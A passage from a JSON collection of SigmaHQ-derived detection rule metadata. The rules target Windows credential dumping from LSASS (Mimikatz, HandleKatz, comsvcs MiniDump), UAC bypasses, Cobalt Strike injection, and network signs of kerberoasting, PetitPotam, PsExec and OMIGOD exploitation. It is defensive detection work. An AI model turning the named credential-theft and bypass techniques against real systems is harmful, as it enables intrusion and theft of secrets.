"description": "Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.", "meta": { "author": "oscd.community, Dmitry Uchakin", "creation_date": "2020-10-07", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_uac_bypass_editionupgrademanagerobj.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", "value": "Function Call From Undocumented COM Interface EditionUpgradeManager" }, { "description": "Detects process access request to uncommon target images with a \"PROCESS_ALL_ACCESS\" access mask.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-27", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_susp_all_access_uncommon_target.yml", "level": "low", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_all_access_uncommon_target.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.011" ] }, "related": [ { "dest-uuid": "0042a9f5-f053-4769-b3ef-9ad018dfa298", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a24e5861-c6ca-4fde-a93c-ba9256feddf0", "value": "Uncommon Process Access Rights For Target Image" }, { "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2012-06-27", "falsepositive": [ "Actual failures in lsass.exe that trigger a crash dump (unlikely)", "Unknown cases in which WerFault accesses lsass.exe" ], "filename": "proc_access_win_lsass_werfault.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "value": "Credential Dumping Attempt Via WerFault" }, { "description": "Detects process access requests from hacktool processes based on their default image name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-11-27", "falsepositive": [ "Unlikely" ], "filename": "proc_access_win_hktl_generic_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://jsecurity101.medium.com/bypassing-access-mask-auditing-strategies-480fb641c158", "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_generic_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d0d2f720-d14f-448d-8242-51ff396a334e", "value": "HackTool - Generic Process Access" }, { "description": "Detects suspicious access to LSASS handle via a call trace to \"seclogon.dll\" with a suspicious access right.", "meta": { "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-29", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_seclogon_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", "https://twitter.com/SBousseaden/status/1541920424635912196", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_seclogon_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", "value": "Suspicious LSASS Access Via MalSecLogon" }, { "description": "Detects LSASS process access requests from a source process with the \"dump\" keyword in its image name.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-10", "falsepositive": [ "Rare programs that contain the word dump in their name and access lsass" ], "filename": "proc_access_win_lsass_dump_keyword_image.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "value": "LSASS Memory Access by Tool With Dump Keyword In Name" }, { "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", "meta": { "author": "Bhabesh Raj (rule), @thefLinkk", "creation_date": "2022-06-27", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_handlekatz_lsass_access.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/codewhitesec/HandleKatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.defense-evasion", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "value": "HackTool - HandleKatz Duplicating LSASS Handle" }, { "description": "Detects suspicious access to the \"svchost\" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.", "meta": { "author": "Tim Burrell", "creation_date": "2020-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_svchost_susp_access_request.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/hlldz/Invoke-Phant0m", "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_susp_access_request.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "value": "Suspicious Svchost Process Access" }, { "description": "Detects the process injection of a LittleCorporal generated Maldoc.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_littlecorporal_generated_maldoc.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/connormcgarr/LittleCorporal", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml" ], "tags": [ "attack.execution", "attack.t1204.002", "attack.t1055.003" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "value": "HackTool - LittleCorporal Generated Maldoc Injection" }, { "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_uac_bypass_wow64_logger.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "value": "UAC Bypass Using WOW64 Logger DLL Hijack" }, { "description": "Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.", "meta": { "author": "Patryk Prauze - ING Tech", "creation_date": "2019-05-20", "falsepositive": [ "Unlikely" ], "filename": "proc_access_win_lsass_remote_access_trough_winrm.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1003.001", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "value": "Remote LSASS Process Access Through Windows Remote Management" }, { "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-20", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", "value": "Lsass Memory Dump via Comsvcs DLL" }, { "description": "Detects when a process tries to access the memory of svchost to potentially dump credentials.", "meta": { "author": "Florent Labouyrie", "creation_date": "2021-04-30", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_svchost_credential_dumping.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_credential_dumping.yml" ], "tags": [ "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "174afcfa-6e40-4ae9-af64-496546389294", "value": "Credential Dumping Attempt Via Svchost" }, { "description": "Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-10", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_lsass_whitelisted_process_names.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1460597833917251595", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_whitelisted_process_names.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "value": "LSASS Access From Potentially White-Listed Processes" }, { "description": "Detects process access requests to LSASS process with potentially suspicious access flags", "meta": { "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "creation_date": "2021-11-22", "falsepositive": [ "Legitimate software such as AV and EDR" ], "filename": "proc_access_win_lsass_susp_access_flag.yml", "level": "medium", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_susp_access_flag.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.s0002" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", "value": "Potentially Suspicious GrantedAccess Flags On LSASS" }, { "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-04", "falsepositive": [ "Unknown" ], "filename": "proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml", "level": "high", "logsource.category": "process_access", "logsource.product": "windows", "refs": [ "https://github.com/boku7/spawn", "https://github.com/boku7/injectAmsiBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", "value": "HackTool - CobaltStrike BOF Injection Pattern" }, { "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", "meta": { "author": "Samir Bousseaden, @neu5ron, Tim Shelton", "creation_date": "2020-04-02", "falsepositive": [ "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "filename": "zeek_smb_converted_win_lm_namedpipe.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://twitter.com/menasec1/status/1104489274387451904", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", "value": "First Time Seen Remote Named Pipe - Zeek" }, { "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", "meta": { "author": "sigma", "creation_date": "2020-02-12", "falsepositive": [ "Normal enterprise SPN requests activity" ], "filename": "zeek_susp_kerberos_rc4.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://adsecurity.org/?p=3458", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", "value": "Kerberos Network Traffic RC4 Ticket Encryption" }, { "description": "Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.\n", "meta": { "author": "Josh Brower @DefensiveDepth", "creation_date": "2020-08-22", "falsepositive": [ "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." ], "filename": "zeek_rdp_public_listener.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://attack.mitre.org/techniques/T1021/001/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", "value": "Publicly Accessible RDP Service" }, { "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-06-23", "falsepositive": [ "Unknown" ], "filename": "zeek_default_cobalt_strike_certificate.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" ], "tags": [ "attack.command-and-control", "attack.s0154" ] }, "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", "value": "Default Cobalt Strike Certificate" }, { "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "zeek_http_webdav_put_request.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", "value": "WebDav Put Request" }, { "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "meta": { "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", "creation_date": "2020-04-02", "falsepositive": [ "Transferring sensitive files for legitimate administration work by legitimate administrator" ], "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2e69f167-47b5-4ae7-a390-47764529eff5", "value": "Transferring Files with Credential Data via Network Shares - Zeek" }, { "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", "meta": { "author": "SOC Prime, Adam Swan", "creation_date": "2020-05-01", "falsepositive": [ "Unknown" ], "filename": "zeek_http_executable_download_from_webdav.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29", "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", "value": "Executable from Webdav" }, { "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "meta": { "author": "Samir Bousseaden, @neu5ron, Tim Shelton", "creation_date": "2020-04-02", "falsepositive": [ "Unknown" ], "filename": "zeek_smb_converted_win_susp_psexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", "value": "Suspicious PsExec Execution - Zeek" }, { "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", "meta": { "author": "@neu5ron, @Antonlovesdnb, Mike Remen", "creation_date": "2021-08-17", "falsepositive": [ "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." ], "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://threatpost.com/microsoft-petitpotam-poc/168163/", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ "attack.t1557.001", "attack.t1187" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "value": "Potential PetitPotam Attack Via EFS RPC Calls" }, { "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", "meta": { "author": "Michael Portera (@mportatoes)", "creation_date": "2022-04-21", "falsepositive": [ "Unknown" ], "filename": "zeek_dns_nkn.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/Maka8ka/NGLite", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/nknorg/nkn-sdk-go", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", "value": "New Kind of Network (NKN) Detection" }, { "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", "meta": { "author": "Samir Bousseaden, @neu5rn", "creation_date": "2020-04-03", "falsepositive": [ "Unknown" ], "filename": "zeek_smb_converted_win_atsvc_task.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" ], "tags": [ "attack.lateral-movement", "attack.persistence", "car.2013-05-004", "car.2015-04-001", "attack.t1053.002" ] }, "related": [ { "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" }, { "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", "meta": { "author": "Saw Winn Naung , Azure-Sentinel", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "zeek_dns_torproxy.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", "value": "DNS TOR Proxies" }, { "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", "meta": { "author": "@neu5ron, SOC Prime", "creation_date": "2020-03-19", "falsepositive": [ "Windows administrator tasks or troubleshooting", "Windows management scripts or software" ], "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1547.004" ] }, "related": [ { "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", "value": "MITRE BZAR Indicators for Persistence" }, { "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", "meta": { "author": "Nate Guagenti (neu5ron)", "creation_date": "2021-09-20", "falsepositive": [ "Exploits that were attempted but unsuccessful.", "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client 